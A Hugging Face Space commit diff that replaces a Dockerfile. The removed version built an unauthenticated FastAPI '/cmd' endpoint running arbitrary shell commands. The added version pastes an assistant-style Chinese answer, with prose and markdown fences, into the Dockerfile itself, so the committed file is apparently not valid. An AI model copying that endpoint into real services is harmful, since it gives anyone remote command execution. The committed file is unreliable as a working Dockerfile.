Spaces:

javaeeduke
/

llm

Sleeping

App Files Files Community

javaeeduke commited on 7 days ago

Commit

680f451

verified ·

1 Parent(s): 596061c

Update Dockerfile

Browse files

Files changed (1) hide show

Dockerfile +66 -42

Dockerfile CHANGED Viewed

@@ -1,50 +1,74 @@
 FROM ubuntu:22.04
-# 1. 安装系统依赖 + Python
-RUN apt-get update && apt-get install -y \
-    wget \
-    curl \
-    ca-certificates \
-    python3 \
-    python3-pip \
-    python3-venv \
-    && rm -rf /var/lib/apt/lists/*
-# 2. 设置工作目录
 WORKDIR /app
-# 3. 下载 llamafile（可选，如果你需要它）
-RUN curl -L -o llamafile \
     https://github.com/Mozilla-Ocho/llamafile/releases/download/0.9.2/llamafile-0.9.2 \
-    && chmod +x llamafile
-# 4. 安装 Python 依赖
-RUN pip3 install --no-cache-dir fastapi uvicorn
-# 5. 生成 app.py（你的 API 接口）
-RUN echo 'import os, subprocess\n\
-from fastapi import FastAPI, Query\n\
-import uvicorn\n\
-app = FastAPI()\n\
-@app.get("/")\n\
-def index():\n\
-    return {"status": "running", "msg": "Welcome to Agent-Reach API"}\n\
-@app.get("/cmd")\n\
-def run_command(q: str = Query(..., description="command")):\n\
-    try:\n\
-        result = subprocess.check_output(q, shell=True, stderr=subprocess.STDOUT, text=True)\n\
-        return {"code": 0, "output": result}\n\
-    except subprocess.CalledProcessError as e:\n\
-        return {"code": 1, "output": e.output}\n\
-if __name__ == "__main__":\n\
-    uvicorn.run(app, host="0.0.0.0", port=7860)\n\
-' > /app/app.py
-# 6. 权限（可选）
-RUN chmod -R 777 /app
-# 7. 暴露端口
 EXPOSE 7860
-# 8. 启动
-CMD ["python3", "/app/app.py"]

+下面这个可以直接复制到 Hugging Face Space 里的 **`Dockerfile`** 使用。
+这个版本是：**llamafile + Qwen2.5-1.5B-Instruct-GGUF + 7860 端口聊天网页**。
+```dockerfile
 FROM ubuntu:22.04
+ENV DEBIAN_FRONTEND=noninteractive
 WORKDIR /app
+# 安装基础工具
+RUN apt-get update && apt-get install -y --no-install-recommends \
+    ca-certificates \
+    curl \
+    wget \
+    bash \
+    && rm -rf /var/lib/apt/lists/*
+# 下载 llamafile 主程序
+RUN curl -L --fail \
     https://github.com/Mozilla-Ocho/llamafile/releases/download/0.9.2/llamafile-0.9.2 \
+    -o /app/llamafile \
+    && chmod +x /app/llamafile
+# 下载 GGUF 模型
+# 这个模型比较适合 HF 免费 CPU Space
+RUN curl -L --fail \
+    https://huggingface.co/Qwen/Qwen2.5-1.5B-Instruct-GGUF/resolve/main/qwen2.5-1.5b-instruct-q8_0.gguf \
+    -o /app/model.gguf
+# Hugging Face Space 默认网页端口
 EXPOSE 7860
+# 启动 llamafile Web Chat
+CMD ["/app/llamafile", \
+     "-m", "/app/model.gguf", \
+     "--server", \
+     "--host", "0.0.0.0", \
+     "--port", "7860", \
+     "-ngl", "0", \
+     "-t", "2", \
+     "-c", "4096"]
+```
+你还需要确认 `README.md` 顶部是这样：
+```yaml
+---
+title: LLM Chat
+emoji: 🤖
+colorFrom: blue
+colorTo: purple
+sdk: docker
+app_port: 7860
+pinned: false
+---
+```
+提交后等它重新 Build，成功后直接打开：
+```text
+https://huggingface.co/spaces/javaeeduke/llm
+```
+就应该能看到 llamafile 的聊天界面。
+如果这个 1.5B Q8 模型启动慢，可以把模型换成更小的 0.5B：
+```dockerfile
+RUN curl -L --fail \
+    https://huggingface.co/Qwen/Qwen2.5-0.5B-Instruct-GGUF/resolve/main/qwen2.5-0.5b-instruct-q8_0.gguf \
+    -o /app/model.gguf
+```